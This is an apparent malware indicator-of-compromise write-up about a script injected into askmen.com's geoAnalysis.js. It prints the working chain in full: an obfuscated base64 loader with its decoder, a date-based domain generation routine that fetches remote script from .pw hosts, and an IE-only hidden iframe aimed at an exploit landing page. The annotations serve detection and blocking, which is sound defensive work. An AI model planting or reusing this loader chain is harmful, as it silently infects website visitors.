malwageddon

IOC - www.askmen.com

Jun 25th, 2014
  1. // JS script at www.askmen.com/includes/js/lib/geoAnalysis.js contains the following JS at the bottom:
  2.  
  // Stage-1 loader, reproduced verbatim as found (keep byte-identical for signature matching).
  // It decodes the base64 blob with b64dec() (defined further down; function declarations
  // are hoisted, so the call works), strips the run of NUL bytes that b64dec emits for
  // the '=' padding, and executes the result as an inline <script>.
  // "SCR" + "IPT" is string splitting, presumably to defeat naive matching on
  // createElement("SCRIPT") — the split literal itself is a usable detection hint.
  var s = document.createElement("SCR" + "IPT");
  // NOTE: the regex has no /g flag, so only the first run of NUL bytes is removed.
  s.text = b64dec("MzM4MjcxNjt2YXIgcXdxd3Fxd3Fxd3F3d3Fxd3d3cXFxcXc9J3FxcXFxcXF3d3d3cXdxcXFxcXd3d3F3d3cnO2Z1bmN0aW9uIGNyY1RhYmxlRygpe3ZhciBjO3ZhciBjcmNUYWJsZSA9IFtdO2Zvcih2YXIgbiA9MDsgbiA8IDI1NjsgbisrKXtjID0gbjtmb3IodmFyIGsgPTA7IGsgPCA4OyBrKyspe2MgPSAoKGMmMSkgPyAoMHhFREI4ODMyMCBeIChjID4+PiAxKSkgOiAoYyA+Pj4gMSkpO31jcmNUYWJsZVtuXSA9IGM7fXJldHVybiBjcmNUYWJsZTt9O2Z1bmN0aW9uIGNyYzMyKHN0cikge3ZhciBjcmNUYWJsZSA9IGNyY1RhYmxlRygpO3ZhciBjcmMgPSAwIF4gKC0xKTtmb3IgKHZhciBpID0gMDsgaSA8IHN0ci5sZW5ndGg7IGkrKyApIHtjcmMgPSAoY3JjID4+PiA4KSBeIGNyY1RhYmxlWyhjcmMgXiBzdHIuY2hhckNvZGVBdChpKSkgJiAweEZGXTt9cmV0dXJuIChjcmMgXiAoLTEpKSA+Pj4gMDt9O3ZhciBkID0gIi09LSI7dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlU3RyID0gZGF0ZS5nZXRVVENGdWxsWWVhcigpICsgZCArIChkYXRlLmdldFVUQ01vbnRoKCkrMSkgKyBkICsgZGF0ZS5nZXRVVENEYXRlKCk7d2luZG93LmFybXA9ZnVuY3Rpb24ocCl7dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTsgcy50ZXh0ID0gYjY0ZGVjKHApLnJlcGxhY2UoL1wwKy8sJycpOyBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHMpO307dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTtzLnNyYz0iaHR0cDovLyIgKyBjcmMzMihkYXRlU3RyKS50b1N0cmluZygxNikgKyAiLnB3L2JsZGUuaHRtbD8iK01hdGgucmFuZG9tKCk7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzKTs=").replace(/\0+/, '');
  document.body.appendChild(s);
  6.  
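  /**
   * Decodes a base64 string using a hand-built alphabet table (no atob()).
   *
   * Quirks of the original that are preserved on purpose, because the loader
   * above depends on them:
   *  - '=' padding and any character outside the 64-character alphabet look up
   *    as undefined; that turns the bit accumulator into NaN for the rest of the
   *    current 72-character chunk, and every byte emitted from then on is "\0"
   *    (which is why callers follow up with .replace(/\0+/, '')).
   *  - Input is consumed in 72-character chunks (72 * 6 = 432 bits, an exact
   *    multiple of 8), so chunking never splits a byte.
   *  - The result is a "binary string": one character per byte, no UTF-8 decoding.
   *
   * Fix versus the original: the alphabet loop assigned to an undeclared `z`,
   * which leaks a global in sloppy mode and throws a ReferenceError under
   * strict mode / ES modules. It is now a local index loop.
   *
   * @param {string} s base64 text, with or without '=' padding
   * @returns {string} decoded bytes, one character (code 0..255) per byte
   */
  function b64dec(s) {
      var w = String.fromCharCode;
      // Standard alphabet order as half-open code-point ranges: A-Z, a-z, 0-9, '+', '/'.
      var ranges = [[65, 91], [97, 123], [48, 58], [43, 44], [47, 48]];
      var alphabet = [];
      var z, i;
      for (z = 0; z < ranges.length; z++) {
          for (i = ranges[z][0]; i < ranges[z][1]; i++) {
              alphabet.push(w(i));
          }
      }
      var lookup = {};
      for (i = 0; i < 64; i++) {
          lookup[alphabet[i]] = i;
      }
      var r = '';
      for (i = 0; i < s.length; i += 72) {
          var chunk = s.substring(i, i + 72);
          var bits = 0;   // bit accumulator; only its low bits are ever read
          var count = 0;  // number of accumulated bits not yet emitted
          for (var x = 0; x < chunk.length; x++) {
              // Unknown characters give undefined -> NaN accumulator -> "\0" bytes.
              bits = (bits << 6) + lookup[chunk.charAt(x)];
              count += 6;
              while (count >= 8) {
                  count -= 8;
                  r += w((bits >>> count) % 256);
              }
          }
      }
      return r;
  }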
  42.  
  43. // when executed, this produces the following JS (decoded from the base64 blob above):
  44.  
  // Opaque marker string, not referenced anywhere in the visible code. It looks like
  // obfuscation padding or a build/campaign tag; the literal may serve as a static
  // signature for this loader variant, but confirm against other samples first.
  var qwqwqqwqqwqwwqqwwwqqqqw = 'qqqqqqqwwwwqwqqqqqwwwqwww';
  46.  
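  /**
   * Builds the 256-entry lookup table for CRC-32 with the reflected polynomial
   * 0xEDB88320 (the IEEE 802.3 / zlib variant).
   *
   * Entries are computed with `^`, so they are signed 32-bit ints: entries whose
   * top bit is set come out negative. crc32() below masks the index with & 0xFF
   * and the result with >>> 0, so the sign never leaks out.
   *
   * @returns {number[]} 256 signed 32-bit table entries
   */
  function crcTableG() {
      var crcTable = [];
      for (var n = 0; n < 256; n++) {
          var c = n;
          for (var k = 0; k < 8; k++) {
              c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
          }
          crcTable[n] = c;
      }
      return crcTable;
  }

  /**
   * CRC-32 of a string, treating each UTF-16 code unit & 0xFF as one byte
   * (characters above U+00FF are folded, not UTF-8 encoded).
   *
   * Fix versus the original: the table was rebuilt on every call; it is now
   * built lazily once and cached on the function object. Same results, same
   * interface.
   *
   * @param {string} str input text
   * @returns {number} unsigned 32-bit CRC (0 .. 4294967295)
   */
  function crc32(str) {
      var crcTable = crc32.table || (crc32.table = crcTableG());
      var crc = -1; // same as 0 ^ (-1): start with all bits set
      for (var i = 0; i < str.length; i++) {
          crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];
      }
      return (crc ^ (-1)) >>> 0; // final xor, then unsign
  }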
  // Domain generation, reproduced verbatim: the host is the hex CRC-32 of a UTC date
  // string of the form "YYYY-=-M-=-D", so it changes once per UTC day and depends on
  // nothing but the date. Defenders can evaluate the same two functions to compute
  // a given day's <crc32hex>.pw host ahead of time for blocking or log searches.
  var d = "-=-";
  var date = new Date();
  // getUTCMonth() is 0-based, hence +1; month and day are not zero-padded.
  var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth() + 1) + d + date.getUTCDate();
  // Stage-2 hook exposed on window: decodes a base64 argument with b64dec(), strips
  // the leading run of NUL bytes, and runs it as an inline <script>. Presumably the
  // fetched page calls armp(...) with the next payload — only the definition is visible here.
  window.armp = function (p) {
      var s = document.createElement('SCRIPT');
      s.text = b64dec(p).replace(/\0+/, '');
      document.body.appendChild(s);
  };
  // Loads http://<crc32hex>.pw/blde.html?<random> as a script; the random query
  // string is presumably a cache buster. Note `s` shadows the stage-1 `s` above.
  var s = document.createElement('SCRIPT');
  s.src = "http://" + crc32(dateStr).toString(16) + ".pw/blde.html?" + Math.random();
  document.body.appendChild(s);
  79.  
  80. // this JS will generate a URL similar to these
  81.  
  82. http://55fd8fe0.pw/blde.html?0.5656226223404374
  83. http://22fabf76.pw/blde.html?0.3542296437611776
  84. http://be90becd.pw/nbe.html?0.5180308921262622
  85. http://9b66653c.pw/nbe.html?0.44849819945207525
  86.  
  87. // these links deliver a base64-encoded JS payload. Example:
  88.  
  // Decoded stage-2 payload, reproduced verbatim. It only fires for Internet Explorer:
  // the UA contains "msie" (older IE) or "trident" together with "rv:11" (IE11's UA
  // string). Other browsers get nothing, which also hides the chain from analysts
  // who replay the page in a non-IE browser.
  var ua = navigator.userAgent.toLowerCase();
  if (ua.indexOf("msie") != -1 || ((ua.indexOf("trident") != -1) && (ua.indexOf("rv:11") != -1))) {
      var d = document.createElement('div');
      // 'i' + 'fr' + 'ame' — string splitting so no literal "iframe" appears in the source.
      var f = document.createElement('i' + 'fr' + 'ame');
      // 100x100 frame parked 10000px off the left edge: present in the DOM, never visible.
      f.setAttribute('style', 'width:100px;height:100px;position:absolute;left:-10000px;top:0;');
      // Landing-page URL. The "PHPSSESID" parameter (note the non-standard spelling)
      // carries an opaque token and a base64-looking suffix; a hidden-iframe-to-random-
      // subdomain pattern like this is a good detection hint in proxy/DOM telemetry.
      f.setAttribute('src', 'http://ushbnasdahfjashdajsdhu.thenettyjostoryorhowilearnedtolovehollywoodland.com/?PHPSSESID=njrMNruDMhzIFIDALOXES7tHNErPThnJkpDZw-4|MzIxNmFjZTA1ZTRkMWI5YmQ0MDZhOTY2NjgyZjU0MWU');
      d.appendChild(f);
      document.body.appendChild(d);
  }
  98.  
  99. // and that page then delivers the exploit code; in my case it was an IE VML exploit.